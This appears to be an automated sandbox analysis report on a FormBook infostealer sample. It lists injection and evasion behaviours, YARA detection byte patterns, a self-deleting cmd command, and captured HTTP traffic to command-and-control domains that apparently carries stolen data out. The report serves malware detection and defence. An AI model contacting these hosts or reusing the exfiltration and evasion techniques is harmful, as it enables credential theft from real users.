Loading ...

Play interactive tourEdit tour

Analysis Report R6o4qCis6s.exe

Overview

General Information

Sample Name:R6o4qCis6s.exe
Analysis ID:287799
MD5:79f04bd1fc5f9757f7979bb8cbefdd5e
SHA1:e34056989f520736af44df68d869b71a4d4d695f
SHA256:8aafecddd3b462d27c24000757496edb5c6bce1e6abff9157d5360457b0805d7
Tags:exe

Most interesting Screenshot:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Detected FormBook malware
Detected unpacking (changes PE section rights)
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Yara detected FormBook
Contains functionality to detect sleep reduction / modifications
Creates an undocumented autostart registry key
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Modifies the prolog of user mode functions (user mode inline hooks)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Tries to detect virtualization through RDTSC time measurements
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file access)
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to create guard pages, often used to hinder reverse engineering and debugging
Contains functionality to detect sandboxes (mouse cursor move detection)
Contains functionality to dynamically determine API calls
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May check if the current machine is a sandbox (GetTickCount - Sleep)
May sleep (evasive loops) to hinder dynamic analysis
PE file contains strange resources
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Startup

  • System is w10x64
  • R6o4qCis6s.exe (PID: 6652 cmdline: 'C:\Users\user\Desktop\R6o4qCis6s.exe' MD5: 79F04BD1FC5F9757F7979BB8CBEFDD5E)
    • R6o4qCis6s.exe (PID: 6680 cmdline: 'C:\Users\user\Desktop\R6o4qCis6s.exe' MD5: 79F04BD1FC5F9757F7979BB8CBEFDD5E)
      • explorer.exe (PID: 3376 cmdline: MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • explorer.exe (PID: 7040 cmdline: C:\Windows\SysWOW64\explorer.exe MD5: 166AB1B9462E5C1D6D18EC5EC0B6A5F7)
          • cmd.exe (PID: 368 cmdline: /c del 'C:\Users\user\Desktop\R6o4qCis6s.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 6204 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000001.00000002.256707467.0000000000D30000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    00000001.00000002.256707467.0000000000D30000.00000040.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x98d8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x9b42:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x15675:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x15161:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x15777:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x158ef:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0xa55a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x143dc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xb253:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x1b267:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1c26a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    00000001.00000002.256707467.0000000000D30000.00000040.00000001.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
    • 0x18349:$sqlite3step: 68 34 1C 7B E1
    • 0x1845c:$sqlite3step: 68 34 1C 7B E1
    • 0x18378:$sqlite3text: 68 38 2A 90 C5
    • 0x1849d:$sqlite3text: 68 38 2A 90 C5
    • 0x1838b:$sqlite3blob: 68 53 D8 7F 8C
    • 0x184b3:$sqlite3blob: 68 53 D8 7F 8C
    00000005.00000002.480556818.00000000027D0000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
      00000005.00000002.480556818.00000000027D0000.00000040.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
      • 0x98d8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x9b42:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x15675:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x15161:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x15777:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x158ef:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0xa55a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x143dc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xb253:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x1b267:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1c26a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      Click to see the 22 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      0.2.R6o4qCis6s.exe.41b0000.3.raw.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
        0.2.R6o4qCis6s.exe.41b0000.3.raw.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
        • 0x98d8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x9b42:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x15675:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x15161:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x15777:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x158ef:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0xa55a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x143dc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0xb253:$sequence_7: 66 89 0C 02 5B 8B E5 5D
        • 0x1b267:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x1c26a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
        0.2.R6o4qCis6s.exe.41b0000.3.raw.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
        • 0x18349:$sqlite3step: 68 34 1C 7B E1
        • 0x1845c:$sqlite3step: 68 34 1C 7B E1
        • 0x18378:$sqlite3text: 68 38 2A 90 C5
        • 0x1849d:$sqlite3text: 68 38 2A 90 C5
        • 0x1838b:$sqlite3blob: 68 53 D8 7F 8C
        • 0x184b3:$sqlite3blob: 68 53 D8 7F 8C
        0.2.R6o4qCis6s.exe.4170000.2.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
          0.2.R6o4qCis6s.exe.4170000.2.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
          • 0x8ad8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x8d42:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x14875:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x14361:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x14977:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x14aef:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0x975a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x135dc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0xa453:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x1a467:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x1b46a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
          Click to see the 19 entries

          Sigma Overview

          No Sigma rule has matched

          Signature Overview

          Click to jump to signature section

          Show All Signature Results

          AV Detection:

          barindex
          Antivirus / Scanner detection for submitted sampleShow sources
          Source: R6o4qCis6s.exeAvira: detected
          Antivirus detection for URL or domainShow sources
          Source: http://www.heyidianzib.com/tln/Avira URL Cloud: Label: malware
          Source: http://www.heyidianzib.comAvira URL Cloud: Label: malware
          Source: http://www.heyidianzib.com/tln/www.olisolution.comAvira URL Cloud: Label: malware
          Multi AV Scanner detection for domain / URLShow sources
          Source: www.glowtey.comVirustotal: Detection: 7%Perma Link
          Source: http://www.glowtey.com/tln/Virustotal: Detection: 8%Perma Link
          Source: http://www.glowtey.comVirustotal: Detection: 7%Perma Link
          Multi AV Scanner detection for submitted fileShow sources
          Source: R6o4qCis6s.exeVirustotal: Detection: 77%Perma Link
          Source: R6o4qCis6s.exeReversingLabs: Detection: 79%
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000001.00000002.256707467.0000000000D30000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.480556818.00000000027D0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.482583136.00000000045B0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.476122908.0000000000220000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000001.213014038.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.256661656.0000000000D00000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.215688359.0000000004170000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.215724959.00000000041B0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.256039719.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0.2.R6o4qCis6s.exe.41b0000.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.R6o4qCis6s.exe.4170000.2.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.R6o4qCis6s.exe.41b0000.3.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.1.R6o4qCis6s.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.R6o4qCis6s.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.1.R6o4qCis6s.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.R6o4qCis6s.exe.4170000.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.R6o4qCis6s.exe.400000.0.unpack, type: UNPACKEDPE
          Machine Learning detection for sampleShow sources
          Source: R6o4qCis6s.exeJoe Sandbox ML: detected
          Source: 0.2.R6o4qCis6s.exe.4170000.2.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 0.2.R6o4qCis6s.exe.41b0000.3.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 1.1.R6o4qCis6s.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 1.2.R6o4qCis6s.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: C:\Users\user\Desktop\R6o4qCis6s.exeCode function: 0_2_00408D20 FindFirstFileA,FindClose,FileTimeToLocalFileTime,FileTimeToDosDateTime,
          Source: C:\Users\user\Desktop\R6o4qCis6s.exeCode function: 0_2_00405BE0 GetModuleHandleA,GetProcAddress,lstrcpyn,lstrcpyn,lstrcpyn,FindFirstFileA,FindClose,lstrlen,lstrcpyn,lstrlen,lstrcpyn,

          Networking:

          barindex
          Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
          Source: TrafficSnort IDS: 1201 ATTACK-RESPONSES 403 Forbidden 34.102.136.180:80 -> 192.168.2.4:49734
          Source: global trafficHTTP traffic detected: GET /tln/?TTF=D8Oxqr&jfIlkD=Gih6PLZ1iCkKV6XaU73/B7cCcaHYH4uOLwbm5LWBOFF6YtYGomD/H0QVY53aBPOxn4Dm HTTP/1.1Host: www.cashflowtoday.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /tln/?jfIlkD=aheimOvVxRHS9+ZkV/8M4zSPjXUKcvGCrPlEERzYyjhu9GlhsqSRacAATphOmA3mqti9&TTF=D8Oxqr HTTP/1.1Host: www.themayoparty.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: Joe Sandbox ViewIP Address: 34.102.136.180 34.102.136.180
          Source: Joe Sandbox ViewASN Name: AMAZON-02US AMAZON-02US
          Source: Joe Sandbox ViewASN Name: GOOGLEUS GOOGLEUS
          Source: global trafficHTTP traffic detected: POST /tln/ HTTP/1.1Host: www.themayoparty.comConnection: closeContent-Length: 412Cache-Control: no-cacheOrigin: http://www.themayoparty.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.themayoparty.com/tln/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 6a 66 49 6c 6b 44 3d 53 44 53 59 34 70 6a 41 33 6a 36 6e 38 70 55 4b 56 5a 31 79 6b 58 61 72 72 6e 38 72 62 76 4b 2d 76 4b 59 47 61 43 48 30 7a 57 56 55 34 55 74 77 39 76 6e 57 63 37 74 6e 43 73 73 52 6b 45 6e 4a 6d 74 4c 4a 6b 64 79 35 72 4a 33 4c 73 6f 39 50 58 34 73 6e 46 67 69 4a 56 6d 4a 6f 73 4c 73 31 4e 36 6e 31 6a 41 48 36 30 47 74 52 6d 46 6f 6b 32 51 75 66 52 53 46 32 42 6b 57 58 76 5f 67 4d 4c 33 57 67 74 67 28 4c 50 6a 77 52 5a 38 30 70 63 69 71 33 70 32 50 34 65 32 62 78 68 43 64 55 32 70 6f 59 48 54 73 5a 5a 4f 6e 70 66 42 7a 67 39 67 76 4a 6e 66 35 68 6f 35 49 65 71 34 72 4f 53 6e 35 77 55 4f 76 79 71 52 38 61 7e 55 76 62 51 4c 67 46 45 74 72 69 6c 41 72 50 4e 74 74 52 38 63 68 34 7a 6e 6f 56 4b 50 46 59 62 37 7e 5a 73 70 6c 71 37 7a 47 5f 33 78 38 6e 76 34 46 33 7e 73 4e 62 62 55 64 66 67 2d 34 44 4c 32 61 4f 6e 69 77 31 36 43 78 66 61 43 73 6f 42 30 30 48 49 4b 65 75 57 5a 61 79 76 46 56 56 6f 67 37 52 69 65 53 70 50 75 5a 52 69 4d 64 78 44 56 33 64 30 31 28 6c 59 6f 70 4d 4a 50 79 54 76 33 71 55 49 59 72 79 28 44 49 6e 34 32 76 57 49 72 39 50 63 44 28 37 43 76 46 51 76 4f 36 32 41 6f 51 58 59 59 62 32 6a 57 5a 4b 6f 76 55 46 63 73 76 74 4b 44 74 6b 65 55 35 46 33 31 6c 33 51 44 38 77 31 51 29 2e 00 00 00 00 00 00 00 00 Data Ascii: jfIlkD=SDSY4pjA3j6n8pUKVZ1ykXarrn8rbvK-vKYGaCH0zWVU4Utw9vnWc7tnCssRkEnJmtLJkdy5rJ3Lso9PX4snFgiJVmJosLs1N6n1jAH60GtRmFok2QufRSF2BkWXv_gML3Wgtg(LPjwRZ80pciq3p2P4e2bxhCdU2poYHTsZZOnpfBzg9gvJnf5ho5Ieq4rOSn5wUOvyqR8a~UvbQLgFEtrilArPNttR8ch4znoVKPFYb7~Zsplq7zG_3x8nv4F3~sNbbUdfg-4DL2aOniw16CxfaCsoB00HIKeuWZayvFVVog7RieSpPuZRiMdxDV3d01(lYopMJPyTv3qUIYry(DIn42vWIr9PcD(7CvFQvO62AoQXYYb2jWZKovUFcsvtKDtkeU5F31l3QD8w1Q).
          Source: global trafficHTTP traffic detected: POST /tln/ HTTP/1.1Host: www.themayoparty.comConnection: closeContent-Length: 163864Cache-Control: no-cacheOrigin: http://www.themayoparty.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.themayoparty.com/tln/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 6a 66 49 6c 6b 44 3d 53 44 53 59 34 72 44 2d 34 7a 28 5f 74 73 45 4c 48 35 6c 71 67 54 66 31 76 6e 41 34 5a 39 4c 48 77 4b 31 44 61 47 44 77 7e 7a 4a 4b 79 56 39 77 71 36 4c 64 49 4c 74 67 47 63 73 51 7a 55 6a 66 6c 36 33 42 6b 63 47 48 72 4a 28 49 69 37 30 46 57 6f 73 38 45 42 65 31 52 57 31 34 73 4a 6f 51 4e 5a 4c 39 32 77 44 36 77 32 6c 54 6a 55 34 57 78 56 43 61 4e 52 78 5f 48 6d 57 4f 76 4e 6b 65 4b 58 50 50 71 69 62 4e 43 78 73 4b 57 66 73 56 62 78 37 33 7a 79 6e 5f 52 52 79 31 28 56 4e 51 36 49 6f 6d 49 79 73 65 61 2d 28 67 56 6a 71 64 32 78 72 30 6b 50 6f 53 6f 34 51 67 7e 61 7e 51 57 6d 6c 34 54 5f 7a 55 68 41 6f 4c 79 48 72 44 55 4a 49 34 49 49 6a 4e 73 6b 6d 4b 48 64 49 4c 77 2d 6f 39 77 46 5a 72 46 61 31 55 54 75 61 78 71 36 70 79 6d 6a 61 35 37 53 63 72 68 4c 4d 36 35 76 67 30 44 55 64 30 6d 2d 34 58 44 6d 61 59 31 53 46 33 36 7a 42 32 61 45 73 45 4f 77 45 4b 46 70 71 75 59 63 7e 4a 70 31 46 5a 67 77 4c 74 31 4a 79 67 63 63 45 74 6c 4d 64 70 44 58 50 73 30 31 28 48 59 70 70 71 49 36 61 54 76 6e 4c 4b 50 5f 48 2d 32 6a 49 71 39 6e 66 55 54 73 30 45 63 44 6e 37 44 61 70 71 76 39 71 32 45 39 55 51 59 35 62 32 67 6d 5a 4b 6a 50 56 67 55 50 7e 41 48 6a 67 74 4f 58 41 77 36 41 30 42 66 53 74 65 33 79 39 67 72 6d 53 36 5a 6f 58 48 79 67 30 58 73 64 56 62 78 66 63 6b 51 2d 44 78 75 72 4e 30 4f 79 64 63 43 5f 28 4c 77 55 4d 76 35 35 74 58 28 74 4e 67 55 4d 76 59 68 63 51 6d 7a 4c 57 2d 59 76 6b 4e 72 65 61 4a 49 47 57 48 44 53 58 33 35 2d 46 30 76 74 51 67 42 44 35 4d 4e 4f 77 47 49 79 73 78 53 41 45 73 79 32 7a 39 48 6b 73 4d 34 69 6b 77 7a 70 34 32 32 72 70 61 78 70 33 33 35 70 50 6e 53 70 75 34 6b 59 7e 64 4c 62 74 65 47 73 5a 45 33 49 28 51 54 30 55 4e 4b 66 62 4b 46 48 77 71 36 68 54 6e 48 32 49 6c 4f 6c 50 75 43 72 43 62 48 65 73 67 33 32 7e 74 49 50 54 38 79 53 44 63 52 47 68 55 57 6a 51 76 6e 45 47 61 47 35 50 38 4e 62 42 48 6d 67 52 4c 7a 66 6d 2d 50 44 46 64 62 61 33 6c 7a 4a 6e 4f 43 39 61 48 6f 74 73 49 5a 55 65 31 7a 34 4f 70 37 4c 78 52 63 41 48 4a 45 31 6f 7a 45 39 5a 31 48 72 5a 56 6f 5a 4f 4b 6d 51 59 69 7e 36 31 68 78 5a 67 63 50 4e 4f 42 4b 6d 76 79 73 7a 66 77 43 35 43 79 6f 43 69 73 41 2d 77 57 6d 68 54 49 6a 77 5a 32 49 37 7e 57 43 77 70 51 33 67 68 63 46 49 39 4c 41 5a 56 30 62 61 74 49 48 47 74 64 30 6a 57 6c 5a 66 39 4a 73 43 4d 62 46 46 44 6f 55 67 6b 74 7a 48 6e 4a 42 41 41 6b 44 41 72 59 64 34 57 4d 4c 70 50 67 6a 74 5a 53 39 72 4e 6d 49 58 35 64 56 5a 76 74 55 70 72 58 4e 68 34 51 72 5f 30 4e 72 36 64 55 48 68 65 4a 28 2d 39 6c 74 59 72 6d 77 75 52 38 6f 70 33 56 45 53 75 43 70 2d 30 75 38 66 50 36 47 6a 66 4
          Source: global trafficHTTP traffic detected: GET /tln/?TTF=D8Oxqr&jfIlkD=Gih6PLZ1iCkKV6XaU73/B7cCcaHYH4uOLwbm5LWBOFF6YtYGomD/H0QVY53aBPOxn4Dm HTTP/1.1Host: www.cashflowtoday.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /tln/?jfIlkD=aheimOvVxRHS9+ZkV/8M4zSPjXUKcvGCrPlEERzYyjhu9GlhsqSRacAATphOmA3mqti9&TTF=D8Oxqr HTTP/1.1Host: www.themayoparty.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: unknownDNS traffic detected: queries for: www.cashflowtoday.net
          Source: unknownHTTP traffic detected: POST /tln/ HTTP/1.1Host: www.themayoparty.comConnection: closeContent-Length: 412Cache-Control: no-cacheOrigin: http://www.themayoparty.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.themayoparty.com/tln/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 6a 66 49 6c 6b 44 3d 53 44 53 59 34 70 6a 41 33 6a 36 6e 38 70 55 4b 56 5a 31 79 6b 58 61 72 72 6e 38 72 62 76 4b 2d 76 4b 59 47 61 43 48 30 7a 57 56 55 34 55 74 77 39 76 6e 57 63 37 74 6e 43 73 73 52 6b 45 6e 4a 6d 74 4c 4a 6b 64 79 35 72 4a 33 4c 73 6f 39 50 58 34 73 6e 46 67 69 4a 56 6d 4a 6f 73 4c 73 31 4e 36 6e 31 6a 41 48 36 30 47 74 52 6d 46 6f 6b 32 51 75 66 52 53 46 32 42 6b 57 58 76 5f 67 4d 4c 33 57 67 74 67 28 4c 50 6a 77 52 5a 38 30 70 63 69 71 33 70 32 50 34 65 32 62 78 68 43 64 55 32 70 6f 59 48 54 73 5a 5a 4f 6e 70 66 42 7a 67 39 67 76 4a 6e 66 35 68 6f 35 49 65 71 34 72 4f 53 6e 35 77 55 4f 76 79 71 52 38 61 7e 55 76 62 51 4c 67 46 45 74 72 69 6c 41 72 50 4e 74 74 52 38 63 68 34 7a 6e 6f 56 4b 50 46 59 62 37 7e 5a 73 70 6c 71 37 7a 47 5f 33 78 38 6e 76 34 46 33 7e 73 4e 62 62 55 64 66 67 2d 34 44 4c 32 61 4f 6e 69 77 31 36 43 78 66 61 43 73 6f 42 30 30 48 49 4b 65 75 57 5a 61 79 76 46 56 56 6f 67 37 52 69 65 53 70 50 75 5a 52 69 4d 64 78 44 56 33 64 30 31 28 6c 59 6f 70 4d 4a 50 79 54 76 33 71 55 49 59 72 79 28 44 49 6e 34 32 76 57 49 72 39 50 63 44 28 37 43 76 46 51 76 4f 36 32 41 6f 51 58 59 59 62 32 6a 57 5a 4b 6f 76 55 46 63 73 76 74 4b 44 74 6b 65 55 35 46 33 31 6c 33 51 44 38 77 31 51 29 2e 00 00 00 00 00 00 00 00 Data Ascii: jfIlkD=SDSY4pjA3j6n8pUKVZ1ykXarrn8rbvK-vKYGaCH0zWVU4Utw9vnWc7tnCssRkEnJmtLJkdy5rJ3Lso9PX4snFgiJVmJosLs1N6n1jAH60GtRmFok2QufRSF2BkWXv_gML3Wgtg(LPjwRZ80pciq3p2P4e2bxhCdU2poYHTsZZOnpfBzg9gvJnf5ho5Ieq4rOSn5wUOvyqR8a~UvbQLgFEtrilArPNttR8ch4znoVKPFYb7~Zsplq7zG_3x8nv4F3~sNbbUdfg-4DL2aOniw16CxfaCsoB00HIKeuWZayvFVVog7RieSpPuZRiMdxDV3d01(lYopMJPyTv3qUIYry(DIn42vWIr9PcD(7CvFQvO62AoQXYYb2jWZKovUFcsvtKDtkeU5F31l3QD8w1Q).
          Source: explorer.exe, 00000002.00000000.239748077.000000000B156000.00000002.00000001.sdmpString found in binary or memory: http://fontfabrik.com
          Source: explorer.exe, 00000002.00000000.239748077.000000000B156000.00000002.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
          Source: explorer.exe, 00000002.00000000.239748077.000000000B156000.00000002.00000001.sdmpString found in binary or memory: http://www.carterandcone.coml
          Source: explorer.exe, 00000002.00000002.494732018.0000000005917000.00000004.00000001.sdmpString found in binary or memory: http://www.cashflowtoday.net
          Source: explorer.exe, 00000002.00000002.494732018.0000000005917000.00000004.00000001.sdmpString found in binary or memory: http://www.cashflowtoday.net/tln/
          Source: explorer.exe, 00000002.00000002.494732018.0000000005917000.00000004.00000001.sdmpString found in binary or memory: http://www.cashflowtoday.net/tln/www.themayoparty.com
          Source: explorer.exe, 00000002.00000002.494732018.0000000005917000.00000004.00000001.sdmpString found in binary or memory: http://www.cashflowtoday.netReferer:
          Source: explorer.exe, 00000002.00000002.494732018.0000000005917000.00000004.00000001.sdmpString found in binary or memory: http://www.creditcommoncents.com
          Source: explorer.exe, 00000002.00000002.494732018.0000000005917000.00000004.00000001.sdmpString found in binary or memory: http://www.creditcommoncents.com/tln/
          Source: explorer.exe, 00000002.00000002.494732018.0000000005917000.00000004.00000001.sdmpString found in binary or memory: http://www.creditcommoncents.com/tln/www.daddaenterprises.com
          Source: explorer.exe, 00000002.00000002.494732018.0000000005917000.00000004.00000001.sdmpString found in binary or memory: http://www.creditcommoncents.comReferer:
          Source: explorer.exe, 00000002.00000002.494732018.0000000005917000.00000004.00000001.sdmpString found in binary or memory: http://www.daddaenterprises.com
          Source: explorer.exe, 00000002.00000002.494732018.0000000005917000.00000004.00000001.sdmpString found in binary or memory: http://www.daddaenterprises.com/tln/
          Source: explorer.exe, 00000002.00000002.494732018.0000000005917000.00000004.00000001.sdmpString found in binary or memory: http://www.daddaenterprises.com/tln/www.keytoblogging.com
          Source: explorer.exe, 00000002.00000002.494732018.0000000005917000.00000004.00000001.sdmpString found in binary or memory: http://www.daddaenterprises.comReferer:
          Source: explorer.exe, 00000002.00000002.494732018.0000000005917000.00000004.00000001.sdmpString found in binary or memory: http://www.ero-special.net
          Source: explorer.exe, 00000002.00000002.494732018.0000000005917000.00000004.00000001.sdmpString found in binary or memory: http://www.ero-special.net/tln/
          Source: explorer.exe, 00000002.00000002.494732018.0000000005917000.00000004.00000001.sdmpString found in binary or memory: http://www.ero-special.net/tln/www.kjvrvg.com
          Source: explorer.exe, 00000002.00000002.494732018.0000000005917000.00000004.00000001.sdmpString found in binary or memory: http://www.ero-special.netReferer:
          Source: explorer.exe, 00000002.00000000.239748077.000000000B156000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com
          Source: explorer.exe, 00000002.00000000.239748077.000000000B156000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers
          Source: explorer.exe, 00000002.00000000.239748077.000000000B156000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
          Source: explorer.exe, 00000002.00000000.239748077.000000000B156000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
          Source: explorer.exe, 00000002.00000000.239748077.000000000B156000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
          Source: explorer.exe, 00000002.00000000.239748077.000000000B156000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
          Source: explorer.exe, 00000002.00000000.239748077.000000000B156000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
          Source: explorer.exe, 00000002.00000000.239748077.000000000B156000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
          Source: explorer.exe, 00000002.00000000.239748077.000000000B156000.00000002.00000001.sdmpString found in binary or memory: http://www.fonts.com
          Source: explorer.exe, 00000002.00000000.239748077.000000000B156000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn
          Source: explorer.exe, 00000002.00000000.239748077.000000000B156000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
          Source: explorer.exe, 00000002.00000000.239748077.000000000B156000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
          Source: explorer.exe, 00000002.00000000.239748077.000000000B156000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
          Source: explorer.exe, 00000002.00000000.239748077.000000000B156000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
